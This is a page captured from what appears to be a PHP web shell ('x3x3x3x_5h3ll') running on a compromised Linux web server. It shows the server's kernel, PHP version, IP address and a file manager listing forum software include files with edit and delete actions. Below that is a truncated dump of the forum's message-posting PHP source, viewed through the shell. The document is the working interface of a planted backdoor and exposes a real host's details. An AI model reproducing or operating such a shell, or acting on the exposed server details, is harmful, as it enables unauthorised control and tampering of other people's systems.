x3x3x3x_5h3ll
— 53cur3 — 5h3ll_1d —
Linux vps-10654784.cedaps.org.br 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
  INFO SERVER : Apache PHP : 7.4.33
/var/softaculous/fud/default/
162.240.100.168

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACTN ]
+FILE +DIR
admincp.inc 4.195 KB -rw-r--r-- 2021-12-23 09:54 R E G D
allowed_user_lnk.inc 3.616 KB -rw-r--r-- 2023-06-07 08:42 R E G D
cookies.inc 7.593 KB -rw-r--r-- 2021-12-23 09:54 R E G D
draw_forum_list.inc 9.427 KB -rw-r--r-- 2023-06-07 08:42 R E G D
draw_forum_path.inc 1.01 KB -rw-r--r-- 2021-12-23 09:54 R E G D
drawmsg.inc 24.318 KB -rw-r--r-- 2023-06-07 08:42 R E G D
drawpmsg.inc 9.515 KB -rw-r--r-- 2023-06-07 08:42 R E G D
err.inc 4.302 KB -rw-r--r-- 2021-12-23 09:54 R E G D
errmsg.inc 6.18 KB -rw-r--r-- 2023-06-07 08:42 R E G D
forumsel.inc 2.388 KB -rw-r--r-- 2021-12-23 09:54 R E G D
get_cur_ppage.inc 1.043 KB -rw-r--r-- 2021-12-23 09:54 R E G D
imsg_edt.inc 32.419 KB -rw-r--r-- 2023-06-07 08:42 R E G D
logedin.inc 5.923 KB -rw-r--r-- 2023-06-07 08:42 R E G D
post_common.inc 4.771 KB -rw-r--r-- 2021-12-23 09:54 R E G D
post_opt.inc 2.744 KB -rw-r--r-- 2021-12-23 09:54 R E G D
private.inc 7.235 KB -rw-r--r-- 2021-12-23 09:54 R E G D
return.inc 1.134 KB -rw-r--r-- 2021-12-23 09:54 R E G D
tabs.inc 1.633 KB -rw-r--r-- 2021-12-23 09:54 R E G D
th_nav.inc 2.354 KB -rw-r--r-- 2021-12-23 09:54 R E G D
thread_view_common.inc 3.615 KB -rw-r--r-- 2021-12-23 09:54 R E G D
usercp.inc 1.141 KB -rw-r--r-- 2021-12-23 09:54 R E G D
users.inc 21.122 KB -rw-r--r-- 2021-12-23 09:54 R E G D
REQUEST EXIT
reply_to = $reply_to; $fd = db_saq('SELECT t.forum_id, f.message_threshold, f.forum_opt FROM fud30_msg m INNER JOIN fud30_thread t ON m.thread_id=t.id INNER JOIN fud30_forum f ON f.id=t.forum_id WHERE m.id='. $reply_to); } else { $fd = db_saq('SELECT t.forum_id, f.message_threshold, f.forum_opt FROM fud30_thread t INNER JOIN fud30_forum f ON f.id=t.forum_id WHERE t.id='. $th_id); } return $this->add($fd[0], $fd[1], $fd[2], $perm, $autoapprove); } function add($forum_id, $message_threshold, $forum_opt, $perm, $autoapprove=1, $msg_tdescr='') { if (!$this->post_stamp) { $this->post_stamp = __request_timestamp__; } if (!isset($this->ip_addr)) { $this->ip_addr = get_ip(); } $this->host_name = $GLOBALS['FUD_OPT_1'] & 268435456 ? _esc(get_host($this->ip_addr)) : 'NULL'; $this->thread_id = isset($this->thread_id) ? $this->thread_id : 0; $this->reply_to = isset($this->reply_to) ? $this->reply_to : 0; $this->subject = substr($this->subject, 0, 255); // Subject col is VARCHAR(255). if ($GLOBALS['FUD_OPT_3'] & 32768) { // DB_MESSAGE_STORAGE $file_id = $file_id_preview = $length_preview = 0; $offset = $offset_preview = -1; $length = strlen($this->body); } else { $file_id = write_body($this->body, $length, $offset, $forum_id); /* Determine if preview needs building. */ if ($message_threshold && $message_threshold < strlen($this->body)) { $thres_body = trim_html($this->body, $message_threshold); $file_id_preview = write_body($thres_body, $length_preview, $offset_preview, $forum_id); } else { $file_id_preview = $offset_preview = $length_preview = 0; } } /* Lookup country and flag. */ if ($GLOBALS['FUD_OPT_3'] & 524288) { // ENABLE_GEO_LOCATION. $flag = db_saq('SELECT cc, country FROM fud30_geoip WHERE '. sprintf('%u', ip2long($this->ip_addr)) .' BETWEEN ips AND ipe'); } if (empty($flag)) { $flag = array(null, null); } $this->id = db_qid('INSERT INTO fud30_msg ( thread_id, poster_id, reply_to, ip_addr, host_name, post_stamp, subject, attach_cnt, poll_id, icon, msg_opt, file_id, foff, length, file_id_preview, offset_preview, length_preview, mlist_msg_id, poll_cache, flag_cc, flag_country ) VALUES( '. $this->thread_id .', '. $this->poster_id .', '. (int)$this->reply_to .', \''. $this->ip_addr .'\', '. $this->host_name .', '. $this->post_stamp .', '. ssn($this->subject) .', '. (int)$this->attach_cnt .', '. (int)$this->poll_id .', '. ssn($this->icon) .', '. $this->msg_opt .', '. $file_id .', '. (int)$offset .', '. (int)$length .', '. $file_id_preview .', '. $offset_preview .', '. $length_preview .', '. ssn($this->mlist_msg_id) .', '. ssn(poll_cache_rebuild($this->poll_id)) .', '. ssn($flag[0]) .', '. ssn($flag[1]) .' )'); if ($GLOBALS['FUD_OPT_3'] & 32768) { // DB_MESSAGE_STORAGE $file_id = db_qid('INSERT INTO fud30_msg_store (data) VALUES('. _esc($this->body) .')'); if ($message_threshold && $length > $message_threshold) { $file_id_preview = db_qid('INSERT INTO fud30_msg_store (data) VALUES('. _esc(trim_html($this->body, $message_threshold)) .')'); } q('UPDATE fud30_msg SET file_id='. $file_id .', file_id_preview='. $file_id_preview .' WHERE id='. $this->id); } $thread_opt = (int) ($perm & 4096 && isset($_POST['thr_lo